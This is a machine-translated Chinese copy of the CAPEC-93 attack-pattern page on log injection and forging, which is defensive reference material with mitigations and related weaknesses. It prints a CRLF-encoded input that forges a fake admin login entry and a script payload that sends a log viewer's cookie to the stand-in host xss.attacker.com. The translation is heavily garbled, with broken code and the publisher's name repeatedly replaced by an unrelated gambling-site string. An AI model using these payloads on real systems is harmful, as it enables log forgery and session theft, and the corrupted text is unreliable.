CAPEC - CAPEC - 93:日志Injection-Tampering-Forging(版本3.9)


常见的攻击模式枚举和分类社区资源识别和理解的攻击

家>CAPEC列表> capec - 93:日志Injection-Tampering-Forging(版本3.9)

日志Injection-Tampering-Forging capec - 93:

攻击模式ID: 93

抽象:详细的

视图定制的信息:

描述

这种攻击目标目标主机的日志文件。攻击者注入、操纵或伪造恶意日志记录在日志文件中,允许他们误导一个日志审计、覆盖攻击的痕迹,或进行其他恶意行为。目标主机不适当控制日志的访问。结果导致污染数据日志文件导致的失败责任,不可抵赖性和事件取证能力。

攻击的可能性

高

典型的严重性

高

的关系

此表显示了其他的攻击模式和高水平类别相关的这种攻击模式。这些关系被定义为ChildOf ParentOf,给类似的项目可能存在的洞察力在较高和较低的抽象级别。此外,关系如光束,PeerOf, CanAlsoBe定义显示类似的攻击模式,用户可能想要探索。

自然	类型	ID	的名字
ChildOf	标准的攻击模式-一个标准的级别CAPEC中攻击模式是集中在一个特定的方法或技术用于攻击。它通常被视为一个单一的完全执行攻击。标准的攻击模式是为了提供足够的细节来理解特定的技术,以及它如何试图完成预期的目标。标准水平的攻击模式是一种特定类型的一个更抽象的元级别的攻击模式。	268年	审计日志操作
CanPrecede	详细的攻击模式-一个详细级别攻击模式CAPEC提供了一个低水平的细节,通常利用一个特定的技术和针对特定的技术,并表达一个完整的执行流程。详细的攻击模式比元更具体的攻击模式和标准的攻击模式,通常需要一个特定的保护机制来减轻实际攻击。详细的级别攻击模式通常会利用许多不同的标准水平攻击模式链接在一起来完成一个目标。	592年	存储XSS

此表显示了这种攻击模式的观点属于和顶级类别内的这一观点。

视图名称	顶级类别
域的攻击	软件
机制的攻击	操作系统资源

执行流程

探索

确定应用程序的日志文件格式:第一步是探索性意义攻击者观察系统。攻击者寻找行动,很可能被记录的数据。攻击者可能熟悉系统的日志格式。

技术
确定日志工具被应用程序(如log4j)
获取应用程序的源代码来确定日志文件格式。
安装或获取访问实例的应用,观察其日志文件格式。

利用

操作日志文件:攻击者修改日志内容直接通过操纵或锻造或间接通过注入精雕细琢输入目标软件将写日志。这种类型的攻击通常是使用另一个攻击,试图覆盖前面的攻击的痕迹。

技术

使用回车或换行字符开始新的一行在日志文件中,然后添加一个假的条目。例如:

“% d % 0[% 20星期四11月% 2012% 2011:22]:信息:% 20用户% 20 admin % 20记录% 20”

可以添加以下伪造进入一个日志文件:

“(11月12日星期四12:11:22]:信息:用户管理员登录”

不同的应用程序可能需要不同的回车和换行字符的编码。

将脚本插入到日志文件,如果是使用一个web浏览器查看,攻击者将获得一份操作员/管理员的饼干和用户将能够获得。例如,一个可能包含日志文件条目

<脚本>新形象().src = " http://xss.attacker.com/log_cookie?cookie= " + encodeURI(。); > < /脚本

脚本本身将看不到任何人在web浏览器中查看日志(除非他们视图页面的源代码)。

先决条件

目标主机的日志记录用户的行为和数据。

目标主机或日志记录机制不够保护访问日志。

技能要求

(等级:低)

这种攻击可以简单地添加额外的字符记录的数据(如用户名)。添加条目通常比删除条目。

(级别:中等)

更复杂的攻击可以尝试击败输入验证机制。

后果

这个表指定不同的个体与攻击模式相关的后果。范围确定违反了安全属性,而影响了负面的技术影响,如果敌人成功的攻击。可能提供的信息如何可能的具体结果预计将看到列表中相对于其它后果。例如,可能有高可能性模式将被用来实现一定的影响,但较低的可能性,它将被利用来实现不同的影响。

范围	影响	可能性
完整性	修改数据

缓解措施

仔细控制物理日志文件的访问。

不允许污染数据写在日志文件事先输入验证。一个allowlist可能用于适当的验证数据。

使用同步控制执行流。

使用静态分析工具来识别日志锻造缺陷。

避免与工具,查看日志可能解释控制字符文件,如命令行shell。

例子,实例

戴夫·尼尔森和帕特里克Breitenbach贝宝0.50 Web服务(又名PHP工具包),也可能是早期版本,允许远程攻击者错误的付款条目输入日志文件ipn_success.php通过HTTP POST请求。参见:cve - 2006 - 0201

如果一个用户提交的字符串“21”val,以下条目记录:

信息:无法解析val = 21岁

然而,如果攻击者提交的字符串

21 % 0 a % 0 ainfo: +用户+记录+ % 3 dbadguy

以下条目记录:

信息:无法解析val = 21岁
信息:用户登录= badguy

显然,攻击者可以使用同样的机制来插入任意的日志条目。

相关的弱点

一个相关的弱点将一个弱点与这种攻击模式的关系。各协会意味着必须存在一个弱点,对于一个给定的攻击才能成功。如果多个缺陷相关的攻击模式,那么任何的弱点(但不是全部)可能存在的攻击才能成功。每一个相关的弱点是由CWE标识符。

CWE-ID	疲软的名字
117年	不正确的输出中和日志
75年	未能清洁特殊元素转换为不同的平面(特殊元素注入)
150年	中和不当逃脱、元或控制序列

分类法映射

CAPEC映射ATT&CK技术利用一个继承模型简化和减少直接CAPEC / ATT&CK映射。继承的映射表示文本说明父CAPEC有相关ATT&CK映射。注意,ATT&CK企业框架不使用一个继承模型的一部分映射到CAPEC。

(见相关ATT&CK分类法映射父)

引用

ref - 131 j . Viega和g·麦克格劳博士。“构建安全软件”。addison - wesley。2002年。

ref - 550 a . Muffet。“晚上日志是伪造的”。<http://doc.novsu.ac.ru/oreilly/tcpip/puis/ch10_05.htm>。

[ref - 551]“OWASP应用程序安全性的办公桌参考”。日志注入。开放的Web应用程序安全项目(OWASP)。2009年。<https://www.owasp.org/index.php/Log_Injection>。

(ref - 552)增强软件。“SAMATE——软件保证评价指标和工具”。测试用例ID 1579。国家标准与技术研究院(NIST)。2006-06-22。<https://samate.nist.gov/SRD/view_testcase.php?tID=1579>。

内容的历史

提交
提交日期	提交者	组织
2014-06-23 (版本2.6)	CAPEC内容团队	manbetx客户端首页
2014-06-23 (版本2.6)
修改
修改日期	修饰符	组织
2015-11-09 (版本2.7)	CAPEC内容团队	manbetx客户端首页
2015-11-09 (版本2.7)	更新的引用
2017-05-01 (版本2.10)	CAPEC内容团队	manbetx客户端首页
2017-05-01 (版本2.10)	更新Related_Attack_Patterns Related_Weaknesses
2018-07-31 (版本2.12)	CAPEC内容团队	manbetx客户端首页
2018-07-31 (版本2.12)	更新Examples-Instances,引用
2020-07-30 (版本3.3)	CAPEC内容团队	manbetx客户端首页
2020-07-30 (版本3.3)	更新描述、移植Related_Attack_Patterns
2021-06-24 (版本3.5)	CAPEC内容团队	manbetx客户端首页
2021-06-24 (版本3.5)	更新Related_Weaknesses
2022-09-29 (版本3.8)	CAPEC内容团队	manbetx客户端首页
2022-09-29 (版本3.8)	更新Example_Instances、Execution_Flow Taxonomy_Mappings

更多的信息是可用的,请选择一个不同的过滤器。

页面最后更新或审查:2018年7月31日


	站点地图\|使用条款\|隐私政策\|联系我们\| 使用常见的攻击模式枚举和分类(CAPEC)和相关的引用从这个网站的使用条款。CAPEC赞助的美国国土安全部(DHS)网络和基础设施安全机构(CISA)和管理的国土安全系统工程和发展研究所这是由(HSSEDI)manbetx客户端首页(斜方)。版权©2007 - 2023,斜方公司。manbetx客户端首页CAPEC和CAPEC标志是斜方公司的商标。manbetx客户端首页

常见的攻击模式枚举和分类

日志Injection-Tampering-Forging capec - 93: